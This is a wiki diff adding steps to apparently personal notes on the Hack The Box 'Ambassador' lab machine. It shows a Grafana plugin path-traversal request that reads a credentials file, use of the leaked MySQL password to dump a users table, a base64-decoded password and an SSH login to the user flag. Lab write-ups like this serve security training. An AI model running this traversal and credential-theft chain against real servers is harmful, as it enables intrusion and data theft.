Differences

This shows you the differences between two versions of the page.

--- ex:htb:ambassador:start [2022/12/22 11:29] – ebaer
+++ ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer
@@ Line 240: / Line 240: @@
 GET /public/plugins/alertlist/../../../../../../../../var/www/html/index.html
 </code>
+<code>
+/etc/grafana/provisioning/datasources/mysql.yaml
+GET /public/plugins/alertlist/../../../../../../../../etc/grafana/provisioning/datasources/mysql.yaml HTTP/1.1
+HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Cache-Control: no-cache
+Content-Length: 180
+Content-Type: application/x-yaml
+Expires: -1
+Last-Modified: Fri, 02 Sep 2022 00:56:07 GMT
+Pragma: no-cache
+X-Content-Type-Options: nosniff
+X-Frame-Options: deny
+X-Xss-Protection: 1; mode=block
+Date: Thu, 22 Dec 2022 13:26:24 GMT
+Connection: close
+apiVersion: 1
+datasources:
+ - name: mysql.yaml
+   type: mysql
+   host: localhost
+   database: grafana
+   user: grafana
+   password: dontStandSoCloseToMe63221!
+   editable: false
+</code>
+===== msf mysql enum =====
+<code>
+msf6 > use auxiliary/admin/mysql/mysql_enum
+msf6 auxiliary(admin/mysql/mysql_enum) > show info
+       Name: MySQL Enumeration Module
+     Module: auxiliary/admin/mysql/mysql_enum
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+Provided by:
+  Carlos Perez <carlos_perez@darkoperator.com>
+Check supported:
+  No
+Basic options:
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  PASSWORD                   no        The password for the specified username
+  RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+  RPORT     3306             yes       The target port (TCP)
+  USERNAME                   no        The username to authenticate as
+Description:
+  This module allows for simple enumeration of MySQL Database Server
+  provided proper credentials to connect remotely.
+References:
+  https://cisecurity.org/benchmarks.html
+View the full module info with the info -d command.
+msf6 auxiliary(admin/mysql/mysql_enum) > set PASSWORD dontStandSoCloseToMe63221!
+PASSWORD => dontStandSoCloseToMe63221!
+msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 10.129.228.56
+RHOSTS => 10.129.228.56
+msf6 auxiliary(admin/mysql/mysql_enum) > set username grafana
+username => grafana
+msf6 auxiliary(admin/mysql/mysql_enum) > set ConnectTimeout 30
+ConnectTimeout => 30
+msf6 auxiliary(admin/mysql/mysql_enum) > run
+</code>
+-> Timeout (anti metasploit measures?)
+===== MySQL manual =====
+<code>
+show databases;
+use information_schema
+select * from tables;
+| def           | whackywidget       | users                                                | BASE TABLE  | InnoDB             |      10 | Dynamic    |          0 |              0 |       16384 |               0 |            0 |         0 |           NULL | 2022-09-02 00:49:04 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
+| def           | performance_schema | innodb_redo_log_files                                | BASE TABLE  | PERFORMANCE_SCHEMA |      10 | Dynamic    |          1 |              0 |           0 |               0 |            0 |         0 |           NULL | 2022-12-22 09:31:21 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
++---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+
+rows in set (0.325 sec)
+MySQL [information_schema]>  use whackywidget;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+MySQL [whackywidget]> show tables;
++------------------------+
+| Tables_in_whackywidget |
++------------------------+
+| users                  |
++------------------------+
+row in set (0.048 sec)
+MySQL [whackywidget]> select * from users;
++-----------+------------------------------------------+
+| user      | pass                                     |
++-----------+------------------------------------------+
+| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
++-----------+------------------------------------------+
+row in set (0.047 sec)
+</code>
+<code>
+echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
+anEnglishManInNewYork027468
+</code>
+<code>
+sh developer@10.129.228.56
+developer@10.129.228.56's password:
+Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)
+[...]
+Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
+developer@ambassador:~$ cat user.txt
+bdff80ba21c478079a3332f785c4ddba